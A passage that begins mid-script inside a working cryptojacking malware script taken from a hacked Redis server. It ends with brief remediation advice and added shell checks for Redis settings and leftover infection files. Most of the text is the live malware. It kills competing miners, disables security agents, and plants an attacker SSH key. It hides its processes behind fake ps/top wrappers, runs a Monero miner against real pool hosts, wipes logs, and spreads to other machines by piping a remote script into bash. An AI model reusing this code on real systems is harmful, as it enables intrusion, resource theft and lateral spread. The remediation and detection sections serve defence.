-9 % pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj | xargs -I % kill -9 % pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK | xargs -I % kill -9 % pgrep -f servim | xargs -I % kill -9 % pgrep -f kblockd_svc | xargs -I % kill -9 % pgrep -f native_svc | xargs -I % kill -9 % pgrep -f ynn | xargs -I % kill -9 % pgrep -f 65ccEJ7 | xargs -I % kill -9 % pgrep -f jmxx | xargs -I % kill -9 % pgrep -f 2Ne80nA | xargs -I % kill -9 % pgrep -f sysstats | xargs -I % kill -9 % pgrep -f systemxlv | xargs -I % kill -9 % pgrep -f watchbog | xargs -I % kill -9 % pgrep -f OIcJi1m | xargs -I % kill -9 % pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool 
pkill -f XJnRj pkill -f mgwsl pkill -f pythno pkill -f jweri pkill -f lx26 pkill -f NXLAi pkill -f BI5zj pkill -f askdljlqw pkill -f minerd pkill -f minergate pkill -f Guard.sh pkill -f ysaydh pkill -f bonns pkill -f donns pkill -f kxjd pkill -f Duck.sh pkill -f bonn.sh pkill -f conn.sh pkill -f kworker34 pkill -f kw.sh pkill -f pro.sh pkill -f polkitd pkill -f acpid pkill -f icb5o pkill -f nopxi pkill -f irqbalanc1 pkill -f minerd pkill -f i586 pkill -f gddr pkill -f mstxmr pkill -f ddg.2011 pkill -f wnTKYg pkill -f deamon pkill -f disk_genius pkill -f sourplum pkill -f polkitd pkill -f nanoWatch pkill -f zigw pkill -f devtool pkill -f devtools pkill -f systemctI pkill -f watchbog pkill -f cryptonight pkill -f sustes pkill -f xmrig pkill -f xmrig-cpu pkill -f 121.42.151.137 pkill -f init12.cfg pkill -f nginxk pkill -f tmp/wc.confz pkill -f xmrig-notls pkill -f xmr-stak pkill -f suppoie pkill -f zer0day.ru pkill -f dbus-daemon--system pkill -f nullcrew pkill -f systemctI pkill -f kworkerds pkill -f init10.cfg pkill -f /wl.conf pkill -f crond64 pkill -f sustse pkill -f vmlinuz pkill -f exin pkill -f apachiii pkill -f crypto pkill -f tntrecht pkill -f xr pkill -f svcupdate pkill -9 cnrig rm -rf /usr/bin/config.json rm -rf /usr/bin/exin rm -rf /tmp/wc.conf rm -rf /tmp/log_rot rm -rf /tmp/apachiii rm -rf /tmp/sustse rm -rf /tmp/php rm -rf /tmp/p2.conf rm -rf /tmp/pprt rm -rf /tmp/ppol rm -rf /tmp/javax/config.sh rm -rf /tmp/javax/sshd2 rm -rf /tmp/.profile rm -rf /tmp/1.so rm -rf /tmp/kworkerds rm -rf /tmp/kworkerds3 rm -rf /tmp/kworkerdssx rm -rf /tmp/xd.json rm -rf /tmp/syslogd rm -rf /tmp/syslogdb rm -rf /tmp/65ccEJ7 rm -rf /tmp/jmxx rm -rf /tmp/2Ne80nA rm -rf /tmp/dl rm -rf /tmp/ddg rm -rf /tmp/systemxlv rm -rf /tmp/systemctI rm -rf /tmp/.abc rm -rf /tmp/osw.hb rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/.java rm -rf /tmp/.omed rm -rf /tmp/.tmpc rm -rf /tmp/.tmpleve rm -rf /tmp/.tmpnewzz rm -rf /tmp/gates.lod rm -rf /tmp/conf.n rm -rf /tmp/devtool rm -rf 
/tmp/devtools rm -rf /tmp/fs rm -rf /tmp/.rod rm -rf /tmp/.rod.tgz rm -rf /tmp/.rod.tgz.1 rm -rf /tmp/.rod.tgz.2 rm -rf /tmp/.mer rm -rf /tmp/.mer.tgz rm -rf /tmp/.mer.tgz.1 rm -rf /tmp/.hod rm -rf /tmp/.hod.tgz rm -rf /tmp/.hod.tgz.1 rm -rf /tmp/84Onmce rm -rf /tmp/C4iLM4L rm -rf /tmp/lilpip rm -rf /tmp/3lmigMo rm -rf /tmp/am8jmBP rm -rf /tmp/tmp.txt rm -rf /tmp/baby rm -rf /tmp/.lib rm -rf /tmp/systemd rm -rf /tmp/lib.tar.gz rm -rf /tmp/baby rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.mynews1234 rm -rf /tmp/a3e12d rm -rf /tmp/.pt rm -rf /tmp/.pt.tgz rm -rf /tmp/.pt.tgz.1 rm -rf /tmp/go rm -rf /tmp/java rm -rf /tmp/j2.conf rm -rf /tmp/.tmpnewasss rm -rf /tmp/java rm -rf /tmp/go.sh rm -rf /tmp/go2.sh rm -rf /tmp/khugepageds rm -rf /tmp/.censusqqqqqqqqq rm -rf /tmp/.kerberods rm -rf /tmp/kerberods rm -rf /tmp/seasame rm -rf /tmp/touch rm -rf /tmp/.p rm -rf /tmp/runtime2.sh rm -rf /tmp/runtime.sh rm -rf /dev/shm/z3.sh rm -rf /dev/shm/z2.sh rm -rf /dev/shm/.scr rm -rf /dev/shm/.kerberods rm -f /etc/ld.so.preload rm -rf /etc/systemd/system/systemde.service* rm -f /etc/ld.so.preload rm -f /usr/local/lib/libioset.so chattr -i /etc/ld.so.preload rm -f /etc/ld.so.preload systemctl stop moneroocean_miner.service systemctl stop systemde.service rm -f /usr/local/lib/libioset.so rm -rf /tmp/watchdogs rm -rf /etc/cron.d/tomcat rm -rf /etc/rc.d/init.d/watchdogs rm -rf /usr/sbin/watchdogs rm -f /tmp/kthrotlds rm -f /etc/rc.d/init.d/kthrotlds rm -rf /tmp/.sysbabyuuuuu12 rm -rf /tmp/logo9.jpg rm -rf /tmp/miner.sh rm -rf /tmp/nullcrew rm -rf /tmp/proc rm -rf /tmp/2.sh rm /opt/atlassian/confluence/bin/1.sh rm /opt/atlassian/confluence/bin/1.sh.1 rm /opt/atlassian/confluence/bin/1.sh.2 rm /opt/atlassian/confluence/bin/1.sh.3 rm /opt/atlassian/confluence/bin/3.sh rm /opt/atlassian/confluence/bin/3.sh.1 rm /opt/atlassian/confluence/bin/3.sh.2 rm /opt/atlassian/confluence/bin/3.sh.3 rm -rf /var/tmp/f41 rm -rf /var/tmp/2.sh rm -rf /var/tmp/config.json rm -rf /var/tmp/xmrig rm -rf 
/var/tmp/1.so rm -rf /var/tmp/kworkerds3 rm -rf /var/tmp/kworkerdssx rm -rf /var/tmp/kworkerds rm -rf /var/tmp/wc.conf rm -rf /var/tmp/nadezhda. rm -rf /var/tmp/nadezhda.arm rm -rf /var/tmp/nadezhda.arm.1 rm -rf /var/tmp/nadezhda.arm.2 rm -rf /var/tmp/nadezhda.x86_64 rm -rf /var/tmp/nadezhda.x86_64.1 rm -rf /var/tmp/nadezhda.x86_64.2 rm -rf /var/tmp/sustse3 rm -rf /var/tmp/sustse rm -rf /var/tmp/moneroocean/ rm -rf /var/tmp/devtool rm -rf /var/tmp/devtools rm -rf /var/tmp/play.sh rm -rf /var/tmp/systemctI rm -rf /var/tmp/.java rm -rf /var/tmp/1.sh rm -rf /var/tmp/conf.n rm -r /var/tmp/lib rm -r /var/tmp/.lib rm -rf /opt/systemd-service.sh rm -rf /opt/.systemd-service.sh rm -rf /root/.systemd-service.sh rm -rf /usr/share/[crypto] chattr -R -ia /usr/bin/TeamTNT/* chattr -R -ia /usr/bin/watchdogd* rm -rf /usr/bin/watchdogd* service crypto stop systemctl stop crypto.service systemctl stop watchdogd  service watchdogd stop rm -fr /usr/bin/TeamTNT/* chattr -iau /tmp/lok chmod +700 /tmp/lok rm -rf /tmp/lok sleep 1 chattr -i /tmp/kdevtmpfsi echo 1 > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi sleep 1 chattr -i /usr/lib/systemd/systemd-update-daily echo 1 > /usr/lib/systemd/systemd-update-daily chattr +i /usr/lib/systemd/systemd-update-daily >/tmp/svcupdate >/tmp/svcguard >/etc/svcupdate >/etc/svcguard >/etc/cron.daily/logrotate >/etc/cron.hourly/0anacron >/etc/rc.d/rc.local #yum install -y docker.io || apt-get install docker.io; docker ps | grep "pocosow" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "gakeaws" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "azulu" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "auto" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "xmr" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "mine" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "slowhttp" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "bash.shell" | awk "{print $1}" | xargs 
-I % docker kill % docker ps | grep "entrypoint.sh" | awk "{print $1}" | xargs -I % docker kill % docker ps | grep "/var/sbin/bash" | awk "{print $1}" | xargs -I % docker kill % docker images -a | grep "pocosow" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "gakeaws" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "buster-slim" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "hello-" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "azulu" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "registry" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "xmr" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "auto" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "mine" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "monero" | awk "{print $3}" | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk "{print $3}" | xargs -I % docker rmi -f % #echo SELINUX=disabled >/etc/selinux/config service apparmor stop systemctl disable apparmor service aliyun.service stop systemctl disable aliyun.service ps aux | grep -v grep | grep "aegis" | awk "{print $2}" | xargs -I % kill -9 % ps aux | grep -v grep | grep "Yun" | awk "{print $2}" | xargs -I % kill -9 % rm -rf /usr/local/aegis chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /etc/cron.d chattr -R -ia /var/spool/cron/crontabs crontab -r rm -rf /var/spool/cron/* rm -rf /etc/cron.d/* rm -rf /var/spool/cron/crontabs rm -rf /etc/crontab } kill_miner_proc  kill_sus_proc() {     ps axf -o "pid"|while read procid     do             ls -l /proc/$procid/exe | grep /tmp             if [ $? -ne 1 ]             then                     cat /proc/$procid/cmdline| grep -a -E "zzh"                     if [ $? 
-ne 0 ]                     then                             kill -9 $procid                     else                             echo "don"t kill"                     fi             fi     done     ps axf -o "pid %cpu" | awk "{if($2>=40.0) print $1}" | while read procid     do             cat /proc/$procid/cmdline| grep -a -E "zzh"             if [ $? -ne 0 ]             then                     kill -9 $procid             else                     echo "don"t kill"             fi     done } kill_sus_proc  nameserver(){   grep -q 1.1.1.1 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 1.1.1.1" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null }  nameserver  fuckyou(){  $(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "/usr/bin/supervisor…" | awk "{print $1}") -f 2>/dev/null 1>/dev/null) $(docker rm $(docker ps | grep -v grep | grep "/app/BitLockerServi…" | awk "{print $1}") -f 2>/dev/null 1>/dev/null)  rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null killall -9 xmrig 2>/dev/null 1>/dev/null  if [ -f /root/.tmp/xmrig ]; then chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null tmpxmrigfile="/root/.tmp/miner.sh" rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null pkill -f $tmpxmrigfile 
2>/dev/null 1>/dev/null kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null killall $tmpxmrigfile 2>/dev/null 1>/dev/null chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null ps ax| grep xmrig 2>/dev/null 1>/dev/null fi   KINSING1=$(ps ax | grep -v grep |  grep "/var/tmp/kinsing") if [ ! -z "$KINSING1" ]; then chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk "{print $1}") 2>/dev/null 1>/dev/null kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null echo "fuckyou" > /var/tmp/kinsing chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fi  KINSING2=$(ps ax | grep -v grep |  grep "/tmp/kdevtmpfsi") if [ ! 
-z "$KINSING2" ]; then chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk "{print $1}") 2>/dev/null 1>/dev/null kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null echo "fuckyou" > /tmp/kdevtmpfsi chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null history -c 2>/dev/null 1>/dev/null fi  }  fuckyou  downloads() {     if [ -f "/usr/bin/curl" ]     then    echo $1,$2         http_code=`curl -I -m 50 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             curl --connect-timeout 100 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             curl --connect-timeout 100 --retry 100 $1 > $2         else             curl --connect-timeout 100 --retry 100 $3 > $2         fi     elif [ -f "/usr/bin/cd1" ]     then         http_code=`cd1 -I -m 50 -o /dev/null -s -w %{http_code} $1`         if [ "$http_code" -eq "200" ]         then             cd1 --connect-timeout 100 --retry 100 $1 > $2         elif [ "$http_code" -eq "405" ]         then             cd1 --connect-timeout 100 --retry 100 $1 > $2         else             cd1 --connect-timeout 100 --retry 100 $3 > $2         fi     elif [ -f "/usr/bin/wget" ]     then         wget --timeout=50 --tries=100 -O $2 $1         if [ $? -ne 0 ]   then     wget --timeout=100 --tries=100 -O $2 $3         fi     elif [ -f "/usr/bin/wd1" ]     then         wd1 --timeout=100 --tries=100 -O $2 $1         if [ $? 
-eq 0 ]         then             wd1 --timeout=100 --tries=100 -O $2 $3         fi     fi }   unlock_cron() {     chattr -R -ia /var/spool/cron     chattr -ia /etc/crontab     chattr -R -ia /var/spool/cron/crontabs     chattr -R -ia /etc/cron.d }  lock_cron() {     chattr -R +ia /var/spool/cron     chattr +ia /etc/crontab     chattr -R +ia /var/spool/cron/crontabs     chattr -R +ia /etc/cron.d }   if [ -f "$rtdir" ] then         echo "i am root"         mkdir -p /root/.ssh         echo "goto 1" >> /etc/zzhs         chattr -ia /etc/zzh*         chattr -ia /etc/newinit.sh*         chattr -ia /root/.ssh/authorized_keys*         chattr -R -ia /root/.ssh     if [ -f "/bin/ps.original" ]     then         echo "/bin/ps changed"     else         mv /bin/ps /bin/ps.original          echo "#! /bin/bash">>/bin/ps         echo "ps.original $@ | grep -v "zzh|pnscan"">>/bin/ps         chmod +x /bin/ps     touch -d 20160825 /bin/ps         echo "/bin/ps changing"     fi     if [ -f "/bin/top.original" ]     then         echo "/bin/top changed"     else         mv /bin/top /bin/top.original          echo "#! /bin/bash">>/bin/top         echo "top.original $@ | grep -v "zzh|pnscan"">>/bin/top         chmod +x /bin/top     touch -d 20160825 /bin/top         echo "/bin/top changing"     fi     if [ -f "/bin/pstree.original" ]     then         echo "/bin/pstree changed"     else         mv /bin/pstree /bin/pstree.original          echo "#! 
/bin/bash">>/bin/pstree         echo "pstree.original $@ | grep -v "zzh|pnscan"">>/bin/pstree         chmod +x /bin/pstree     touch -d 20160825 /bin/pstree         echo "/bin/pstree changing"     fi     if [ -f "/bin/chattr" ]   then     chattrsize=`ls -l /bin/chattr | awk "{ print $5 }"`     if [ "$chattrsize" -lt "$chattr_size" ]     then       yum -y remove e2fsprogs             yum -y install e2fsprogs     else       echo "no need install chattr"     fi   else       yum -y remove e2fsprogs             yum -y install e2fsprogs     fi       unlock_cron                         rm -f ${crondir}                         rm -f /etc/cron.d/zzh                         rm -f /etc/crontab       echo "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}       echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzh       echo "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontab                         echo crontab created       lock_cron         chmod 700 /root/.ssh/         echo >> /root/.ssh/authorized_keys         chmod 600 /root/.ssh/authorized_keys         echo "ssh-rsa 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 uc1" > /root/.ssh/authorized_keys         cd1 http://195.242.111.238/cleanfda/call.txt         wget -q -O- http://195.242.111.238/cleanfda/call.txt                     file="/etc/zzh"           if [ -f "/etc/zzh" ]     then             filesize1=`ls -l /etc/zzh | awk "{ print $5 }"`             if [ "$filesize1" -ne "$miner_size" ]              then                 pkill -f zzh                 rm /etc/zzh                 downloads $miner_url /etc/zzh $miner_url_backup             else                 echo "not need download"             fi     else             downloads $miner_url /etc/zzh $miner_url_backup     fi       downloads $sh_url /etc/newinit.sh $sh_url_backup       chmod 777 /etc/zzh     if [ -f "/bin/ps.original" ]     then         ps.original -fe|grep zzh |grep -v grep     else         ps 
-fe|grep zzh |grep -v grep     fi     if [ $? -ne 0 ]     then                 cd /etc                 echo "not root runing"                 sleep 5s                                ./zzh --log-file=/etc/etc --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background &     else                 echo "root runing....."     fi      chmod 777 /etc/zzh     chattr +ia /etc/zzh     chmod 777 /etc/newinit.sh     chattr +ia /etc/newinit.sh     chmod 600 /root/.ssh/authorized_keys     chattr +ia /root/.ssh/authorized_keys else     echo "goto 1" > /tmp/zzhs     chattr -ia /tmp/zzh*     chattr -ia /tmp/newinit.sh*              if [ ! -f "/usr/bin/crontab" ]   then       unlock_cron       echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir}       lock_cron   else       unlock_cron       [[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab -       lock_cron   fi       if [ -f "/tmp/zzh" ]     then             filesize1=`ls -l /tmp/zzh | awk "{ print $5 }"`         if [ "$filesize1" -ne "$miner_size" ]          then                 pkill -f zzh                 rm /tmp/zzh                 downloads $miner_url /tmp/zzh $miner_url_backup         else                 echo "no need download"         fi     else             downloads $miner_url /tmp/zzh $miner_url_backup     fi       echo "i am here"     downloads $sh_url /tmp/newinit.sh $sh_url_backup      ps -fe|grep zzh |grep -v grep         if [ $? 
-ne 0 ]             then                 echo "not tmp runing"                 cd /tmp                 chmod 777 zzh                 sleep 5s                             ./zzh --log-file=/tmp/tmp --keepalive --no-color --cpu-priority 5 -o dev.fugglesoft.me:5443 --tls --nicehash --coin monero -o 80.211.206.105:9000 -u 88MjAGcUuFzRM2AaUK1qoj9uTp9VBaFzDDUARzmTZL1XUU3DVVkAtxUUb5sHtFMisnSy5dSLQHfUBVdEVgwuwXm5E7LzQ4z.22 --tls --coin monero -o opn.en2an.top:5443 --tls --nicehash --coin monero --background &             else                 echo "tmp runing....."         fi      chmod 777 /tmp/zzh     chattr +i /tmp/zzh     chmod 777 /tmp/newinit.sh     chattr +i /tmp/newinit.sh          fi  iptables -F iptables -X iptables -A OUTPUT -p tcp --dport 5555 -j DROP iptables -A OUTPUT -p tcp --dport 7777 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 9999 -j DROP iptables -A OUTPUT -p tcp --dport 10008 -j DROP service iptables reload history -c echo > /var/spool/mail/root echo > /var/log/wtmp echo > /var/log/secure echo > /root/.bash_history chmod 444 /usr/bin/chattr chmod 444 /bin/chattr yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "curl -o-  http://195.242.111.238/cleanfda/init.sh | bash >/dev/null 2>&1 &" & done fi if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then   for h in $(grep -oE "b([0-9]{1,3}.){3}[0-9]{1,3}b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h "cd1 -o-  http://195.242.111.238/cleanfda/init.sh | bash >/dev/null 2>&1 &" & done fi echo "$bbdir" echo "$bbdira"  $bbdir -fsSL http://195.242.111.238/cleanfda/is.sh | bash $bbdira -fsSL http://195.242.111.238/cleanfda/is.sh | 
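bash

  Preventing the problem from recurring

  Set a Redis password
  Edit the configuration file:
    vi /opt/myredis/redis.conf
  Set the password as follows:
    requirepass heikeshizhenqian

  Configure the Redis log file
  Edit the configuration file:
    vi /opt/myredis/redis.conf
  Set the log location:
    logfile "/opt/myredis/logs/redis.log"
  Start Redis:
    redis-server /opt/myredis/redis.conf

  Open the security group only to specific IPs
  Do not configure 0.0.0.0/0 in the security group. If you can determine the inbound IPs, always configure those IPs; a safer approach is to configure the outbound IPs as well. Don't give them the slightest chance.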
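  An added example, not part of the original post: a shell audit of redis.conf for the two settings changed above. The function names, the 16-character minimum and both sample files are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the post): audit redis.conf for requirepass and logfile.
MIN_PASS_LEN="${MIN_PASS_LEN:-16}"   # assumed threshold, not a Redis setting

# conf_value FILE DIRECTIVE -> last effective value (later lines override
# earlier ones), with comment lines skipped and surrounding quotes removed.
conf_value() {
    awk -v key="$2" '
        /^[ \t]*#/ { next }
        tolower($1) == key {
            $1 = ""; sub(/^[ \t]+/, ""); gsub(/^"|"$/, "")
            val = $0; seen = 1
        }
        END { if (seen) print val }' "$1"
}

# audit_redis_conf FILE -> one line per check; returns 1 if any check fails.
audit_redis_conf() {
    rc=0
    pass=$(conf_value "$1" requirepass)
    log=$(conf_value "$1" logfile)
    if [ -z "$pass" ]; then
        echo "FAIL requirepass: not set, clients are not authenticated"; rc=1
    elif [ "${#pass}" -lt "$MIN_PASS_LEN" ]; then
        echo "FAIL requirepass: only ${#pass} characters"; rc=1
    else
        echo "OK   requirepass: set, ${#pass} characters"
    fi
    if [ -z "$log" ]; then
        echo "FAIL logfile: empty, output goes to stdout or /dev/null when daemonized"; rc=1
    else
        echo "OK   logfile: $log"
    fi
    return "$rc"
}

# Constructed samples: the state the post started from, and the state after its fix.
write_sample_confs() {
    printf '%s\n' 'port 6379' '# requirepass foobared' 'logfile ""' > "$1/weak.conf"
    printf '%s\n' 'port 6379' 'requirepass changeme' \
        'requirepass heikeshizhenqian' \
        'logfile "/opt/myredis/logs/redis.log"' > "$1/hardened.conf"
}
```

  Run `audit_redis_conf /opt/myredis/redis.conf` before every restart; a non-zero return means the instance would come up without a password or without a log.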
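  The risk from this incident can be considered temporarily resolved, but in the end I still decided to restore my server from scratch, because some of the configuration and temporary files left by the exploit still remain on the server.
  Finally, my advice to everyone: a Redis instance on the public internet must have a password set, and it must be a complex one.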
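  An added example, not part of the original post: a shell check for the leftovers that the newinit.sh script quoted above creates (cron entries, dropped files, the ps/top/pstree wrappers, the "uc1" SSH key, the non-executable chattr). The function names and the sample tree are constructed for illustration; every path checked comes from the script itself.

```shell
#!/bin/sh
# Added example (not from the post): look for what newinit.sh leaves behind.
# Every path and name checked here is taken from the script quoted above.

# scan_newinit_residue ROOT -> one finding per line; returns 1 if any found.
# ROOT defaults to / ; pass a mounted disk image or a test tree instead.
scan_newinit_residue() {
    root="${1:-/}"; root="${root%/}"; found=0
    report() { echo "$1"; found=1; }

    # Cron entries that re-run the script.
    for f in "$root/etc/crontab" "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        [ -f "$f" ] || continue
        if grep -q 'newinit\.sh' "$f"; then report "cron: $f runs newinit.sh"; fi
    done

    # Dropped script, miner binary and marker files.
    for p in /etc/newinit.sh /etc/zzh /etc/zzhs /tmp/newinit.sh /tmp/zzh /tmp/zzhs; do
        if [ -e "$root$p" ]; then report "file: $root$p"; fi
    done

    # ps/top/pstree moved to *.original and replaced by grep -v wrappers.
    for tool in ps top pstree; do
        if [ -e "$root/bin/$tool.original" ]; then
            report "wrapper: $root/bin/$tool.original"
        fi
    done

    # authorized_keys overwritten with a key whose comment is "uc1".
    ak="$root/root/.ssh/authorized_keys"
    if [ -f "$ak" ] && grep -q ' uc1$' "$ak"; then report "ssh: $ak has uc1 key"; fi

    # chattr left at mode 444 so the immutable bits cannot be cleared.
    for c in /usr/bin/chattr /bin/chattr; do
        if [ -f "$root$c" ] && [ ! -x "$root$c" ]; then report "chattr: $root$c not executable"; fi
    done
    return "$found"
}

# Constructed sample tree mimicking an affected host, for offline testing.
make_sample_tree() {
    t=$(mktemp -d)
    mkdir -p "$t/etc/cron.d" "$t/bin" "$t/root/.ssh" "$t/var/spool/cron"
    echo '*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1' > "$t/etc/cron.d/zzh"
    echo '0 3 * * * root /usr/bin/true' > "$t/etc/crontab"
    : > "$t/etc/newinit.sh"; : > "$t/bin/ps.original"
    echo 'ssh-rsa AAAAconstructed uc1' > "$t/root/.ssh/authorized_keys"
    echo "$t"
}
```

  Because the script replaces ps and top on the host, scanning the disk from a rescue system or a mounted snapshot is more trustworthy than running this on the live machine.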
